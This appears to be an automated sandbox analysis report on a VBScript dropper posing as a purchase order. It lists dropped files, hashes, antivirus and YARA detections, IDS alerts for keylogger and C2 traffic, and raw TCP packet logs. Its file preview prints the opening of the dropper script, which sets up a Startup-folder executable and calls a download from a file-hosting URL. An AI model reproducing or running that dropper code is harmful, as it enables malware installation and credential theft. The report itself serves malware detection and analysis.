                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                          C:\Users\user\Documents\LSBIHQFDVT\~$QNCYCDFIJJ.xlsx

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                          Entropy (8bit):1.5231029153786204
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:WH25nJFV:WH2/
                                                                                                                                                                          MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                                                                                          SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                                                                                          SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                                                                                          SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                          C:\Users\user\Documents\LSBIHQFDVT\~$cache1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                          Entropy (8bit):6.638013190381294
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                          MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                          SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                          SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                          SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                          Entropy (8bit):4.3723124208059
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:1FVfpi6ceLP/9skLmb0zyWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:zV1JyWWI/glMM6kF7qq
                                                                                                                                                                          MD5:256B012C274EDA493C5D7CE2C229ACB0
                                                                                                                                                                          SHA1:D17BC9CEE8A2E00A9504E86EB4CEDE6CB3DC0641
                                                                                                                                                                          SHA-256:42E738436220A2D026ECE44ED7C02E3E6B62E7AD59969BD5F44141137C24D182
                                                                                                                                                                          SHA-512:77D930366EC13D07F607D5A96917404633594E2B2A44D87BCB24BF26113137A70FC2C309231B716D199EB6C7934C7B0E4070EDDB22F042728980C6C060C5E706
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:regfD...D....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Un.Z................................................................................................................................................................................................................................................................................................................................................BZ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                          Entropy (8bit):5.498755302006385
                                                                                                                                                                          TrID:
                                                                                                                                                                            File name:Open Purchase Order Summary Sheet.vbs
                                                                                                                                                                            File size:641 bytes
                                                                                                                                                                            MD5:2bf2f38caab1fe7c657d29984c228b71
                                                                                                                                                                            SHA1:7a469f97c2e5d0dc1b786d89fc90c11a413275a5
                                                                                                                                                                            SHA256:44d5e912b8ef69914ba4ba6064dcded455f65e53ae2cfe4addee0f597b51e2c1
                                                                                                                                                                            SHA512:d15b9206341d49ec4928dc8f333c89e7bbc2cf31c3005c5bd6cea8bdbd91505607552c2e833bdbebf2235c75d2aeb97837bd5a9aaa3f531dfe4d2c4a28b2b428
                                                                                                                                                                            SSDEEP:12:qDTRPhvAHZsAbs1vWdEV7wsk/CxbDNfb852ms2/bFNQHJ5xDzVs4vl7iajIlEjv:OTRPm9bs1AwkIbDNDSbbFNQvxDq4d7vP
                                                                                                                                                                            TLSH:66F0230ADC00DAE6063BF5E07552B429D5E30449B2B862252681DD5E5E0C3C91C0089B
                                                                                                                                                                            File Content Preview:'<<< Coded By Mr.3amo>>> ..Set VIkvvtzh = CreateObject("WScript.Shell")..iSquxnRH = VIkvvtzh.SpecialFolders("Startup") & "\Google.exe"..'<<<<<<<<<<< code start >>>>>>>>>>>..On Error Resume Next..wscript.sleep 3000..call jOjxpLIz("https://filedn.com/lp8FEq

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:68d69b8f86ab9a86

                                                                                                                                                                            Network Behavior

                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                            2024-12-30T11:48:31.198826+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849753172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:48:31.198826+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849879172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:48:31.198826+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849796172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:48:31.198826+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849747172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:48:31.198826+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849720172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:48:31.198826+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849837172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:48:55.785865+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849715142.250.185.78443TCP
                                                                                                                                                                            2024-12-30T11:48:55.786424+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849714142.250.185.78443TCP
                                                                                                                                                                            2024-12-30T11:48:55.800485+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849720172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:48:56.102426+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.84971869.42.215.25280TCP
                                                                                                                                                                            2024-12-30T11:48:57.211247+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849722142.250.185.78443TCP
                                                                                                                                                                            2024-12-30T11:48:57.221241+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849721142.250.185.78443TCP
                                                                                                                                                                            2024-12-30T11:48:58.236748+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849729142.250.185.78443TCP
                                                                                                                                                                            2024-12-30T11:48:58.261093+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849730142.250.185.78443TCP
                                                                                                                                                                            2024-12-30T11:48:59.261008+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849734142.250.185.78443TCP
                                                                                                                                                                            2024-12-30T11:48:59.263918+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.849735142.250.185.78443TCP
                                                                                                                                                                            2024-12-30T11:49:04.845921+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849747172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:49:13.865993+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849753172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:49:15.387383+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.84975569.42.215.25280TCP
                                                                                                                                                                            2024-12-30T11:49:22.892519+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849796172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:49:31.988356+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849837172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:49:41.048759+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.849879172.111.138.1005552TCP
                                                                                                                                                                            2024-12-30T11:49:58.562265+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.849879TCP
                                                                                                                                                                            2024-12-30T11:50:36.168810+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.849879TCP

                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                            TCP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Dec 30, 2024 11:48:40.139293909 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:40.139350891 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:40.139410973 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:40.150058031 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:40.150078058 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:40.919142962 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:40.919214964 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:40.967293978 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:40.967319965 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:40.967643023 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:40.967708111 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:40.969360113 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.015333891 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.267008066 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.267044067 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.267086029 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.267113924 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.267126083 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.267163992 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.267690897 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.267750978 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.268184900 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.268245935 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.345256090 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.345335007 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.351375103 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.351416111 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.351444006 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.351458073 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.351473093 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.351500034 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.352399111 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.352432013 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.352461100 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.352466106 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.352514029 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.352514029 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.353228092 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.353286028 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.353976011 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.354027987 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.423392057 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.423553944 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.429830074 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.429873943 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.429944038 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.429963112 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.429974079 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.430005074 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.435918093 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.435956955 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436014891 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436022043 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436059952 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436079025 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436300993 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436361074 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436683893 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436718941 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436731100 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436734915 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436760902 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436779976 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.437534094 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.437573910 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.437616110 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.437621117 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.437648058 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.437668085 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.438441992 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.438477993 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.438497066 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.438502073 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.438525915 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.438549995 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.439248085 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.439296007 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.439297915 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.439307928 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.439347029 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.439356089 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.501918077 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.502037048 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.507742882 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.507812023 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.514146090 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.514178038 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.514219999 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.514228106 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.514242887 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.514266014 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.514328957 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.514373064 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.520262003 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.520318985 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.520430088 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.520467997 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.520478010 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.520483971 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.520494938 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.520523071 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.521110058 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.521146059 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.521167040 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.521172047 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.521198034 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.521215916 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.521962881 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.521994114 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522017002 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522021055 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522043943 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522059917 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522653103 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522687912 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522702932 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522706985 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522717953 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522735119 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522767067 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522770882 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522806883 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.523574114 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.523607969 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.523631096 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.523633957 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.523643970 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.523657084 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.523688078 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.524507046 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.524548054 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.524571896 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.524576902 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.524588108 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.524609089 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.586086035 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.586198092 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.593261003 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.593308926 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.593344927 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.593353987 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.593379021 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.593405962 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.598772049 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.598834038 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.598839045 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.598844051 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.598881006 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.598898888 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.598953962 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.598984957 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.599039078 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.604686022 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.604801893 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.604829073 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.604876041 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.606570959 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.606638908 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.606832981 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.606870890 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.606893063 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.606898069 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.606908083 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.606921911 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.606951952 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.606956005 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.607052088 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.607557058 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.607603073 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.607615948 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.607621908 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.607637882 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.607644081 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.607670069 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.607672930 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.607697964 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.607727051 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.608263016 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.608316898 CET4434970523.109.93.100192.168.2.8
